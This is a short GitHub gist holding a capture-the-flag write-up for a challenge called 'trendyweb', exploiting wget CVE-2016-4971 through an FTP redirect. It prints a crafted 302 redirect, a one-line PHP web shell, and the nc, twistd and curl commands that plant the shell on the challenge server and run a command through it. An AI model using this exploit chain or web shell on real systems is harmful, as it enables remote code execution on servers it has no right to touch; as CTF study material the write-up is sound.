comawill/redirect.http

Last active July 10, 2016 13:16

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/comawill/3c2c381c0d59d3f540e146aeac9a5da0.js"></script>
Save comawill/3c2c381c0d59d3f540e146aeac9a5da0 to your computer and use it in GitHub Desktop.

Download ZIP

trendyweb writeup

Raw

redirect.http

	HTTP/1.1 302 Moved Temporarily
	Content-Length: 0
	Location: ftp://hostname:8089/test.php

Raw

	<?php
	system($_GET['x']);
	?>

Raw

This challenge used wget (version prior 1.18). This version was affected by CVE-2016-4971 (http://seclists.org/oss-sec/2016/q3/34) which allows us to change the requested filename, if we redirect the download via ftp.

Provide a fake webserver with redirect cat redirect.http | nc -vlp 8088

Provide a simple ftp Server twistd -n ftp -p 8089 -r /tmp/ftp/

Inject the controlled url curl "http://chal.cykor.kr:8082/index.php" --data "image=http://hostname:8088/avatar.png"

Get folder name of my session ("99c378ec5ba2e61d86d8") in this case and finally get the flag curl "http://chal.cykor.kr:8082/data/99c378ec5ba2e61d86d8/test.php?x=/flag_is_heeeeeeeereeeeeee"

"1-day is not trendy enough"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment